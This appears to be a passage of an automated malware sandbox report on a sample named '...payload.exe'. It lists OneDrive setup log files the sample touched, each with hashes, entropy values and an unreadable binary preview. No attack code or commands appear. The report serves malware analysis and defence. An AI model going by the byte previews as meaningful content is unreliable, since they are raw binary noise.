                                                                                                      Preview:1.0./..E...P..x|.........&.V..^.\...T.....F..k..-.t..@.../........<c...^{.K........w.G.!...l*...l+....[.1B..}........x.Hz.3].....C..C.T."&M.[.:....Y....m`n..50.HM.+(....$B.!.e..vB..D.{..&.y.u..[.h..+.GE;7}.(...q......].<.OU.......u.'.l."_.......2.E)0..{X.C.v.f<.wP.../..V.*.c.j.j.....d..8..n....i-..b:.LM..wC.....y/..i...[%...ok..........`.2.~....!...o(.e...`...y.t...g..U.=..V.{.;[x..+.%.`.id.R.~.#...Vm=..R.v.py.|+......R...a.zmy..MP.t..|...g5(#..,...8....o.........}....@.R......s.y6.....@.".....G~S...Y.1.. _..j..^ji.<.=.....+"g)...%....W...v]ek$.}..%/.u.......#.W\....^.....:T.+.F.../g.`.u...1...0....je0t. .P...b'.....P...D'.p..m^7.~.....W.....2...+u.w.....7..b.uX5....Bh...uDS../..`<.&.NPa..e...._...s.:..z9....../.\..'.P..j....|.FX...EG...A.....u......03.al4.G.S;....+.:&.c.oV1.. ..|.)...._.PY.3`#.*..+r../..9..p...2.@....,...'Z.....(#.E(1L..:i...^.m....H#..2..STr..Vj..c...<.{..W...._.B....+..:..".Ql.xuU...(s6:...>...A.;.!T.x<..^.R{..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-2023-10-04.1059.6292.1.aodl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.966077233390333
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:vYy9ZwoF4muu7gEEbGCnV0+oqiQE3mO9pbrsE5ZtZaUSzh5nT3u6d:vHjcl5V0gErbrz6Zd5T3Z
                                                                                                      MD5:93DC1E90E76E73E68FBB423B0BDA0EF4
                                                                                                      SHA1:062E72BF2A86642BE6F441BCD853D5E361BB1397
                                                                                                      SHA-256:755E22B3AC670A30DB6BF054955BA10FFF6778EA287CB9E68E4EFB2BA92E0603
                                                                                                      SHA-512:CB6A556E0A809C3A1E1362F587B1D31C988E95944491A842BC5A7B8B6D5C03A2E29DC348D9B78EB5E0AEE779D409AADE4FF32363BE4354361866F0100D95A476
                                                                                                      Malicious:false
                                                                                                      Preview:EBFGO...kC.\U.....wXr......a....p.eE.!7V.C1....iC.g.U...w....c.S`........O(..?JL.....N...B....0.........;.mn=.:0q,.C!..}l..B..H..d.V... H.(.':j.[...:".J.[Fi..0../...v3.N.E.g.dXZ*..p...n...Z..0.().H.HW.Y..."...t.3+....8!Rm.U...0.f.....n.{......P.H.[m..+..,..'..hE.S..s..r.j..gzH../t...OsO.....0\..Y ...8.................I...o.%....#70..?...W.8a..!....3pZ. .b..L..J.....Ta(..<.d...}.i.dM,5.H.|%E...2;JKm.......*.....(......"..1..1.$N..v....r.....c....L.he....).a.&..M...X. ...K.z...697k.9..V...&..P.<S..8..N=...-a..p.;8.%.X....)v.....X..2........en.J.W .W/D7`^j......%.../.dE.._h..Dl..+J .P3..I.....&!.3..(8.....0.AU\..k..%cn......|:h2 ...D.^B.....b.-.w..t..r..l.."....YM.V..~.e{..G..N..../...I......0...;...~.-)10.b"....z."n..0..$9Q..$......Q...D#?.._....-..^F.+.h.r..D.M....,[...d.......Z.3[.}..peO....J..G.7b*;.P<..,..D..RP..9......a.!..$.?...s.b?h">3}0?..HZU...6...B..I.%..7....A..R\..W.Z).?3$..L...(.q........w.Xt........-.....:....0/...I..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-2023-10-04.1059.6292.1.odl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):1.5612475850351153
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:2Vgd6z2pz/Lj+biALFwv2qmsxLSumLPFgu8p0GYLnn:220Ez/XqiAZONmgcPFgrg7
                                                                                                      MD5:BEEF63090ADAD68D0D8E61096E8470BF
                                                                                                      SHA1:8135AE9AC8272904D15DD7B635866E0B848F8C28
                                                                                                      SHA-256:2D2AB398CA59F52163245610D0039C67F9F750E0E57DAEE422EDB813DD968C08
                                                                                                      SHA-512:7F712B197ED9C4B7B74E706796F1E81FB704E44762955882FAD051993F37569C396EA44E7202E42AA92F1E72F5CD6BD8F97985354780DB31DA903AF9F139DD16
                                                                                                      Malicious:false
                                                                                                      Preview:EBFGOt..C....(.(.%."f...Y.NI@...A..0.;...}|..CDfMB..w5..l.!>.B...<...t...Ze....n..l..`.>).....P..!.....F+.....R....rY.......1LYR....E...,.......7...S%.vC..5.>.....-.._0..ZQK.^.G..1_._3......6nSXo......(l....c.&...|,..../.8.4...Bj.....{...~)...^9.V....O..p...h.XK..5R.aX....L.[3....".t.MNG(k.,.......:....,B.P..d.;.v..8..L..z.Y..Wa.[i.v.k`.v..?.....SdC.c....j.G..[.v.}.tcN.+..j.2.Ky.CX..u~r_..v.)..p.....7...^..1....,......__k..9.._.C-5.xP.P.....2.h...G6.....+....s...8..@...Hne...#.....am....DM.|..*.w....Y.:..t.g.H..fs.!.n..NTf.3....... ....Q....^P/{....Q..2........<...b....i.)...s.8............[..A...^...<;.Uz.AA,.....h..q.{<..>..2@..BFP..3.........v.)Edv..Q...m...u....H....1....%.....0$G.9.......T.J.Da=.../tK..Y....X.H...fY.dTQ.,...K_._.p..(..i{........R.]..s.W..f.....m....a..`.^..x..]....O...T..xL..t..... ....d...P..4kF{..t......n...W.JT.].v._._.`6Su.^..s......@O.v ...g.Mk@M.v]&.\A....0.jC,cgCF..,zF...}. .u....z..8D....b....Zl..e#.......

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine-2023-10-04.1059.3196.1.aodl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.865118216747812
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:eQVCZP7HELpEk2nV2QOteiyEGd2hDRqYasN8Hc+tFqFvS4:SZjHEQnARURUDdIckGS
                                                                                                      MD5:042CE3E15B2CF3B63E63006D264744D8
                                                                                                      SHA1:DAEAE0F6F12B3F21040B418A92CBECCA668367DE
                                                                                                      SHA-256:4E629AEA554B38086883DC1294B3FD86A8D241139FDAF4F48BBCF481ED4FFFBC
                                                                                                      SHA-512:3140AE19BBD8DCBD470FD1D028F1FE84955FA934A0B3C77C487C5812969AD62758E8F351B78A6C9A86CD68090A642C599C11D1C3B0A5B139338E6CD4F09E093E
                                                                                                      Malicious:false
                                                                                                      Preview:EBFGO3J...#.X...x^..ay.5...@...I..l.cGA_.g..fF..XY.\P.W..5..+......U..yM.....5...B...b...:/..j..........@..C..........Y .b.e...a......e..Zj.!.7{_....!`....n.....l>._.Kv.;.4...I........_......]n.....xRTs~l_.u..J#|....|$.^>............3l..7Q.F...J.D....r.O...?,..Yh.|N.R..?...).Ko.f.>.r.%[%..wH6...$%E....q............+.T..44p{.S..Q....D.H_..m.ZM4....]&.....B.S6G..oo\....Y<.....9w`.J.{.K!.TPO.~$...#..HIy,....Lp.Y.ld$y..6.%6...;.L,]......?Y+WK!n%Qx....cb.WQ^C....?..3%...f..-Lq7+...\K..!...%...a.~,...-.K...L...;....e..f...^s.Df(...[...y<..0...D\3'C..._z...BL......qD...nW...h..%..L.o*....q.^.PoW...3..M..z..b K..G..Z..N&KJF`..^.....ax..$..K........V>.@.g..0.T,..=+.......Gf...N.(.....E#...]^..q^.B.........<...t.z....o..=.>...+O...........|vK..~....p...v.3...@<.!.g..l....,.m.0.\.r#.f.lf......b.#?#.V.q......6...>.+M0`/..>E...[Fk.....0....0<.....\>...1]..j......K.%H..m......4.....iM.|+$@.BUuy...... Pw|;L.U6..YF.8....&:.8.N../....uK+L.R.....3.*

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine-2023-10-04.1059.3196.1.odl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.2067706719635832
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:wHfoTDJLjSWMLNBEtGOz1rBaIVKK2ZxBYbidUv6bz:w/oTDJXSdLbEt11rIgKKUYmdUwz
                                                                                                      MD5:A37343810FCB3E19B45364D379DD87F9
                                                                                                      SHA1:F816A60720BAD4BF897A43592777DE4CF1BBAA30
                                                                                                      SHA-256:E262B72BFF5CCCEC1F38D74B02AE3CB3A49F0633354D4FEF2F0C556CB4DD8828
                                                                                                      SHA-512:9946DDFB9665EB77250D0F342593418B6F204D44A217C5A23A1451AD21CB2E1B2A9849C5220D7694A01608C5928AA4E5369133DCE615C17B94BB52E045544357
                                                                                                      Malicious:false
                                                                                                      Preview:EBFGO.o........TX. ..b.`}.Iy...j.Q.K.6f.9.M;.......%..y{..r...............2A".....y....H....W..<.}.D...nkKu..e..rz.."...i....t...k"..ju..2....._)........E...3.Y./b{.F&..c..^,%$W....AnY..4.x......(h....w.E...x...z/X.[.7.c;.v..o&..#..<7..\.O.5.>.......u.....q.t|...b^T<s.>.....<....KD.P..xAab...i.V.D......#.5.....*'c].XK.#.au...(9K[jz0..71rK.....a...r(...-..B.sA^...r.t.?<.../OL5...-i.$.n...2Q8Z*...s.*...@.u.v.5.*..Z1/=t.$U.c....s ..Uz...\.R......`..=.....I3}|.0.........1.O:...`.{...D...r...c..~6....R8..../hf..........>N=..f3~.../..u.F=_......w.'..'.S.X......c.^.',m.N.5....il.lWh..|.R.....;.!>..9~@....{z....0.Up.FRM3<N4J:rJ,{.;..j6r<..4.....jA.Y...V......b....GK...p*w....3...m.Ycx..ly...T...%.*r.#.h...D.lh.wy..h... .w........\.Y.....P%R..).KS5.!.l....Q.A.?.!e.4.y'hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}........................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerMachine_2023-10-04_105957_c7c-3d4.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):3.457296809670533
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:DLKRjdNobdVJQjvH/UABzT804/qx3PiiAFuTJUUIcAu3O6ArtxTk:IxN4erHh80uq5iBwTQcAzNxTk
                                                                                                      MD5:0574B156AE40D5ADDD147D9DA8E21363
                                                                                                      SHA1:6C2256BBD7F13250382CBD9BE2D4C7596EF52D30
                                                                                                      SHA-256:0B6C998EA5FD8CB088ECEA58C4EE3E6518D601399428A4EF1E5E9D77B57A14A1
                                                                                                      SHA-512:C12382930A89AD5E139D145068AD8A18D3FCDC84E7ECA96A2E94CCE8D187B1002E42A5F3E0AD8839645A107BEA94A1AD711832AB84B317EA4B9FE28BB65D8C59
                                                                                                      Malicious:false
                                                                                                      Preview:1.0./......L.3~D.aZb.AU..Gs. o...9..........l.>.t..d..H.G.Y..lr.*.K.E.u.....hCP...u..[\....l.p.m...........z.&.r....z.......*........E.Q.X..A...Uy.>.E.}....$....=7.W...8...y...,_.Y/./.V.6j......n+.'%.6.9Y$ ........B!..3S.$.WW...3..]7.......-\.....G........Hh......a...>.P.|......y.s].O...m..D...[..N.@..).)...H..(.k.3..a...N..[....3.7.<>..Q......J.8dN.$0L%i....`-!.._TV..?b.._.........8......)..!Z..%..>..^...+...Y7.d;@.....E...x.qC..Y.(/.a..F..BL..{W.~.A...#.>.... .....x.J.R:..$.)+Q.......8...."..x.9./E..}Q...j....*.S.{`...._.Zp.JWBL65.A#.g.......(...A...Y...ZXD.........0.r..9.Xu.!...^m.....%..;...4]7.&..T.2..qLy@.C.jh|.^...C\...O_.S=4j....w.Ydc.O.A...y...aCl.W.....iM6..n.]=..ho4..r....S.8.m~6.C...(..`..s.|..V\]9v".E.,k&....(. C..........wI<QV..uo5u..e.....n_~f...P..&G..h..dA...T..G..O5|....U../Z...a.b]......"...K.V...%,.,p...4..Ov..I{.e....W....>.L'.O]....k.....3W..h.. ........c...):....IA....d...J.A.1U..............1...Gfh.g...l..

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser-2023-10-04.1059.6636.1.aodl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.9394873893326054
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:zLuoFLXaAozxu7RhpEtz+pugav8E/ljQ+2nXAzeUw+WoK:HZFLqAok7Rh+tzsTQ8EdM+CAzeR+Wo
                                                                                                      MD5:5FCBEDD7EBC910FE662D4CB207E4C10B
                                                                                                      SHA1:CE2C9C457CDC0882F3AD54FF98C730CABB274E05
                                                                                                      SHA-256:A32DF4102E8F79F7C43E38D77EA8704FA52CCC6691EFEC0C1CB9178694E6E8A2
                                                                                                      SHA-512:B7655D5C030349FD0A69B6E4D5D13DE09F3802190941E0E9821F3BD563421C1165F2710B032365C47B1645995EE57BD21D71BB36BC85943F5B619F364CCAB683
                                                                                                      Malicious:false
                                                                                                      Preview:EBFGO.C......u.B.....K2...?M`RB..J...b.&.....i..F<.z.X...9.s.....m..8....j.3I....@q..J..0..l....M..S..hw...=......vg...A...uO(..$...UY..OoSlH......E.Y..^.nx..5;...]<VN.<Q.. .d..>..).W|.>L......\1..p.......'[....([]Vtu+d:....i5.......C\..q....{...!...F`..D.yH.O......S..G?l.i...v.F8&*.<.o!gd,.[:..$..|...o..PhM-l.........l}...(uO.c.);...~G.N9....vTFn.........o.w........2.:C..R.~..W..f..!+<Y.....~a..Y..G.j.CX.X.t.z.k.Yr..~.gu.....0..7..B.a.3;z..>.s.. .(BA.UT......<3%...?....S-.V.T.X.......3..@...,..=2.o3.'...)..:Wu.0.g<o.4.x....0....t.P.C.u.]...S.=..M.....D`@.v|..A.....J.Le...T.7K.y...m..u.{./E 8v..a.%..j.#..z..(9.z.a....0..U....*.K.X...&fZZ..A_.m.69.A3.`..f*.J.......|B[.....u4..0.kR.d..4.......3M.q...w....%B......o......N../M.o|L..#.8.9....A.w...T......U...e.p.k...a<..s..!.TWw]1....T..p*O*..../[_...z..m......%.$.dz...0q....V.....[.1v@....(...6.NMb^.t fYA9...hZ..uf.>Y+....Mt..j.(.O|./....y..G..*....+..xP..b.......^9s.Nc.7.Iu.m...*}o...Ikn..Z.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser-2023-10-04.1059.6636.1.odl

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.2062341839355779
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24:u+r2NiEYOV59RhxtM78zCS1+mgtmTDVwv6bz:uj0mVX7hz91+mawz
                                                                                                      MD5:3EA63D79B3E2137634D7980BE066C1A7
                                                                                                      SHA1:18B65978633B40BBE5870CF41D1FD03BFF3897A0
                                                                                                      SHA-256:99C9C57C1F566E9A7AC190D5061687752E95160E3ABE2987BE585659F8BB77A5
                                                                                                      SHA-512:D64791197BBB08ED5B5434035EF3AB5B244955747F86F5E3A2279E45AECEECFE94419F03150CFC2A7CC64B9F003BA9169769935362D3F5A7F8FF895D45183947
                                                                                                      Malicious:false
                                                                                                      Preview:EBFGO=WaG..0..+.~q..8K...z....]......;d.".`.!sa..[.!"..mJsm.6n.O..1..!.....+.SM.S#.F7....O.,.1...+A.....M.<...Fb..\.^....0J].H..)...v.nQ&.3..>q/.o...l...#....^f.u...M...G.......F....AK.._.E<.....3..k...D.l./+KsWB.a...>..Y.A..B..kR-j.27[.....$..S.-\mE/......V......M.....z..@O.....$.....6X..........[..0...:..8W7..........\.a,.B.<N&..a.J.@..XH..q...J=..n..L...}@BM>...n./#....,..}t..DK.......X...(_i-.c..k..Y.....F..M.....*i.F.=.....;g.A.;K.......f.GK7.....5.6=r..J.%..:..;.Y.e.yM.......C%l...Q....@..b.d.0...a.y....<rRsU3.icM'..S.Ot....W.....b\..fh.|fj&6..l,9.p4.=.s.O.J.P=c~.r..,+.j..K...7y.[m.!...+..r_W.....Cl....Bc..\...6._..mV...y@....|....|...BOK.....6...oQ[.f........y*.N>f8....~.e..^....H~.6............DZ..R.6.... .1.....=......RNj...Jo..).G..u.PvhO.hZRMDGn2o1XdryxaQbOJI60EuHBvAbPnWEccdDt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}........................................................................................................................

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall-PerUser_2023-10-04_105958_19ec-19e8.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):3.8924200148962713
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:384:0MuIDSF9LPNxbyw2TkdJAu1ASodzldjSSXUmpEyEzGaiztOv9bT1WH:nuIDSHL11y5kjT16dzWIUQGGTMT1WH
                                                                                                      MD5:4B2373765B2DA9BB0B47EDAE25A3F0B0
                                                                                                      SHA1:FB633E411585C9679979B998536B128BD5D452BF
                                                                                                      SHA-256:755A21436EDBA18B22DBA1451BAFB8CC7E0F62796BBF3D3FC851D27DA278149A
                                                                                                      SHA-512:22A5199594BE68B31AAA78D438B55D5624858E70AFE75FDFDE79CD40E86816C7CD6CCCE7A1A3FE1307022D3F63F146232EFC955D5265336A59512549264DBA3A
                                                                                                      Malicious:false
                                                                                                      Preview:1.0./.{.K}....2.jf.....u.(.....[.].6uj....Q...yJ.......r...r.#2.M.t.....8..P..X.}.../.!JpF..p..MPV)'&y..u&...Q..v.`:A..3z../....2.W.@(C..c...c......*A[...,:n/u.'....=.80...R.=.......7px..G..0.}...T,E....4@*a....R.&.N....G[.qJ.....@...!.axEW...#Vf.p.&.....~...'.M<...}...:..w....r$i....#.4K.^F{.....&.|.#.k.l.y.MA."..`....K..u.1.Q....h@....-...Y.O...H..+...,..?.........OH.HYpT,..e..qV......f. &...#.k....W....o.X...`.....XA%.9....<...a1!..E...D..@.qF.I../U...x.@.UO.<..o.d.j..}..NR.%.B.....rR@..?4U.B..e_2....y...E.....E....g&......H.>...%...A~...%d. 22`...%>Z.~G.rC..O.a}7A..qZ..*'Zsor.2..~H...(2.....-....[.....b.)...-.O..c..g\.Y.....Tq..,..J_..v>.S;u..R..e.UR....XA=.{ff=.1.n...&.....=./.P=...}......Oz...zP..M...a..-..T........b@.G..6W.Y.I.Q-.Hb.S:.......-.%..^X..-D..B..Y,....w..7.ga..>b.,.rv.....b.W...>8p....DP8Y.Z....R.8&tt.a..$..^S...(....wn*.4Q...PH....u.....7..bTgb.(.@.....x...%......8P..+a..j..OE..l...m..$m:B...X.....#..H.&....b....<...o....

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Uninstall_2023-10-04_105950_1894-1898.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):4.415227866504965
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:XIyWfaxpcPeJapoXDhBkpq5orv0PEzv5U:MfaxAeJ6I9B6pL0SW
                                                                                                      MD5:E283B1E3C72207D900E15056F3DA0DAD
                                                                                                      SHA1:167FFDF0C1E5007F4445B74E8E07237AAAB21951
                                                                                                      SHA-256:AF12C29CB77C57C2F65040B6725F04DC839A28089648059B233E8C9815A768A3
                                                                                                      SHA-512:F83EE6C7771FE06C139437D4D9AD81D659F41469815CB1366A12972C36B7B8AF24772C61C655D562C0E800CB554AE060E63B30E97FFEAC643F91A2CDBCF819B2
                                                                                                      Malicious:false
                                                                                                      Preview:1.0./-.@....-Y..B(...Xz1....$.......3O.S.'.............B:..50d.?T..vK.vy...Xzr..|:J.N.....T..T.0.4.<..1..FG....."..b......3..b.).c.F+..m7..76.h.$s...oF5...F5...>@.....G....2~........_...lg.B..,.K..T....Bg.H..L.lK..o..D&...TQ.)y..m.#..=1[C.X.U!n....].....\ ...a,..2A.!...Z.?(....Z.........V|.A.J...DH..g......_.#~..Z$....7........C.J.H.o....SM..Mt..ye..`......vl..N...0..A.1R.8X..:Z..n.}gW!......}`..<...ED..y...#....d&..[.....T."O>)....-..Mxa.p;.TT.w.Lv.../z:.K..ez~.(.......[.X....h....y.....n...`.~...<..[l5...{.C..x.!RG..4v.G.YMN..B8ih..CH.@..A.H..o..^...+K...y..g^....q.';.|.|S$W.ce.C.r..p..|..qe.~duz.b....a.].a...+..h..!.~...aKgl..M.).._b..$.....3f..M...VG.*...+q..kP...h....L..>.Zn..H.1..|8c/.... ~,...g........r......G.$C...<..5F.......a.y=.E..V.%a..../....H.9.?p...|X.:J.3y....^..........."u.d.q..3,C.....F95.Y.0...:.#........#..)Pu...V....<.{..?.[L..%.o.w......o:V...M;.{..w.Y.#....u.....T...#O"....(.@v+/.. ..u.*.m&.g..b.....Aq..pt.t*5....Q2.'u.o.

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_114942_500-1efc.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):4.556230316384136
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:0oXk9FTj4P1h+THe97/Nek/LvNRkwT1Yz+b6fUk5PhMnq:qDjAzOk7FeqVRkGqz+Q75qn
                                                                                                      MD5:0026E21A96996E339EF1A2DFA3B52984
                                                                                                      SHA1:414F74BDBA1816367A7EC984AEFB122B598851EC
                                                                                                      SHA-256:6F096297459FAEBD706DCD9CEB4F5B7F700855C93AD278ECAB2ACB4A3EF7E28D
                                                                                                      SHA-512:5F30D0EB2EBE11E98E782DC70ABB7FA3FBBC2EF7A69A6D2B5548DBD9CC112C51280C95658717F0108F7D47C1299CE2928507181F3A4610652997D75A28A78CB5
                                                                                                      Malicious:false
                                                                                                      Preview:1.0./c.{.1=.~.}..=.+.I..t.........3..1.!h.=LM...5....`.a.dl..YF?9.}.S..s.....<w.."..`Q.wu.N.u.......S$.H..T.A.RB|.f...../.....f.%.$..7.e...ns.jr...R.}^..O..^....^:...M..:n..1.o6v.fYt..N.8r..{Z.......rHF>..Qr.S.n.....).mO."!.!n.W.L...L....\j.I |.9.P.Ca>.a..l...L........'..7`\$l.h.8...\.7b~..?.......H...F.\4..._f~..R.L..[.v.ac.D..T..O..P...e..\^..5-h.D....>@tD.....8.V..u.AF..."3X1..[)..0......./.D.U.3......J........l.,.g...Jx.U+O..}.2...E2i!.\L.x.s".z1A.J..<...-...d....'...s../..}Ha.B.Qg.P...+9t.vy....y.H'.3.1..X.(.)...g3Z...^Nx..!...H.9..M/eL.X.d.|B._1..^.:R.8...Mt...c}.orI..kn...Ai........yZ...c..7....d....E...7...D..L......WB[j*.{._.o...K3..r^...d4g.<.`.>}*.;.z..M.as@RR....k...;G1....K..%q...RM.b...U.....iU..~i....4..n%.T...rd..p.............4.Ya..Qg.!.yZ.+D$........)H2.9.........Hl....s0.jq.4g....]...t.uesC0.\).i.$.e.{.+b.B.....MD.C...{.8l|.s.....5.ME2..`....2...Ub.K_3$.........@X..(b:.:uE....HN.H|h..4P.I.6#.....".o....h..7aD.XR.b,.n.V.r\.8].?,

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_115011_3184-4676.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):1.3132096610464528
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:es1qDmj1gPJMxzNnILoWPTjQzTv1C+fbPkA8d:es1cmj1gPmxJeTjQfd5fbPkFd
                                                                                                      MD5:D68A30404972710A4E29EB5D3C9CB299
                                                                                                      SHA1:3AC835D9A52D3DA0170E7D0C1F59E562B7F65012
                                                                                                      SHA-256:E909782FBE45511F6D326226BAF06B4E8524357364004D491183F65E2F78685D
                                                                                                      SHA-512:0A568E8D6A5496392CE3DFEABA605E593A67C4C9B4304C6B501E19780A65D1CCAF15DB492385B1E8ED5D60EA5C1FF96CA22C30DD1289888651C3AA9702C22919
                                                                                                      Malicious:false
                                                                                                      Preview:1.0./.......S.1..RB.q...#Z|-A.}#A@..C.Z.n...?......><.a... ...dEJ.....i...@.:...v..g.a[...x960...f..q.Z.ns.O..Re.*.../R..AU.!P..^g..(..._.f..}..O._4.....N.Q(...&=..@."...I..^.mau`.....=...2..B..t...v........i..pO#.Hk...BA...IZ`...]hA.fc..{.......z...Ax.l).b.PO....#C. ...{.......+...{*..h.U..54./.u..)...u....evf..|.A..tF. ..hN..k.....v..gat.:.O.~b..;..]Z.....m.%..p...0..kk.~=...?..'>r..DT.C....)4.Fv.`.5..Ij!0.iS...i.pa.......u[..'.D..q.)v....>y.......y.o.*..eu.3.!5r5...-.g.~......_).....@m...b"1..@*..0.y.{..,.u..C..A......92mS............]..a.Y.G.....p..........n....\?...../...bP|..?..A...y..@<3..|.P...!.vED+.....1+e..@.%;..`.L.a.@34..Dk)..~/..}4....b...{p..r..O.{.y..V&......=...=L...pch....1.z%.H2.PSnZ...A...,j..b.8........b9..5H.%.... .~.e]eO.h.0".u.]..LH.s.._.....k.J.y6...m3B3X~.,.....y.3F......11#..}V.e}... ~r..4.z.l.(T.U.r.CCH..6..[B].._...I......P..Z....T.....v$.......#..].AL......."........{....&..P..r..4../{ .H.}H.).&v.....kY.x?

                                                                                                      C:\Users\user\AppData\Local\Microsoft\OneDrive\setup\logs\Update_2023-10-03_115204_7008-7012.log

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\c62d6a8f03122f152f75051babb0a9ad178223ae33a2205caf5675f29cf3cef3_payload.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):65536
                                                                                                      Entropy (8bit):0.5741998647364417
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:48:Fh501+GTB/GtCGigm6Oq5lmAqGyLdv6B0bXGFLCpWo58I7IkrWTtcwz:m1DTQtCsN5l3yTCK7h7VWB1
                                                                                                      MD5:A7C3D0100A7F9E72B486B4D6444D7E52
                                                                                                      SHA1:E31980E00597E6F40EBA2515EE0428204A87C188
                                                                                                      SHA-256:1D41F4104D7F4FE671637178387E62308174E71C6D0F868665230D6B6547B094
                                                                                                      SHA-512:0B16F68A836DEB777DAEF1E031AC245EFC032D84E1A0ADCD0C206544A8DB4544D01AF80B0AF4F920415ADEF436254097FF56DC6CD1CC6CEFEFD5AEF89F7579A9
                                                                                                      Malicious:false
                                                                                                      Preview:1.0./...p..`i...V.|Y8c+3....V$fXz.f.....s..z..6`...r.,aJ.&..3.D.S.2.mpJ|...V.......M.TY.,H..H.[h..".1.oQ...y?...u!...Mq.....E4.[...3...t.Fr.\.r..6..8.<..|K}~......0.K.3P.....Y..o..B?R.O..uK.....IR..`...Fb=..%.h.B ....~..Of.).z..1..].l.....zI..*...v......m......0....P{Dw..'....,....-..=.r....A(....k.f.W{9.....c.:..U..P..t...;.-g....H,..ny.*l.....4ga#..w"..l...a.{.C...1.7!.....s^xd.~.KaJ..n.r.C.0. |.@q.o.K.?"./.Xz...=~.|x.3.v!U:,.}Z.`..|.B....a.T.*]:p....exV.....q....(yB.I.g..[...3.d......p}wOG3!r.......m1V*..5..VgM.........j.|...}...q..&~p>"..!....u...z..x....,...x...B~.zR.i.WYl..j'..L.......h..E[F..Tl..q...l.r.A0....r....~....S..t......:0...i'[1}............7!....Rj8.Y-._K.G.&..0./.(......t.R.k..C....;>..%$.rV....r.P.b.+Y.....s.-.v..C....1@.y.........I.jg-.......V0..|.:......>.p..T..c...D.!....K...0b.....,.'..[l.`...3.GHp...z..o...elz...62...-..f_Vt..u.........P.K.`.0.......s.?.6.v{c.r..N....}..BSH|.gX.3. ......lI_.....)U.......d3.

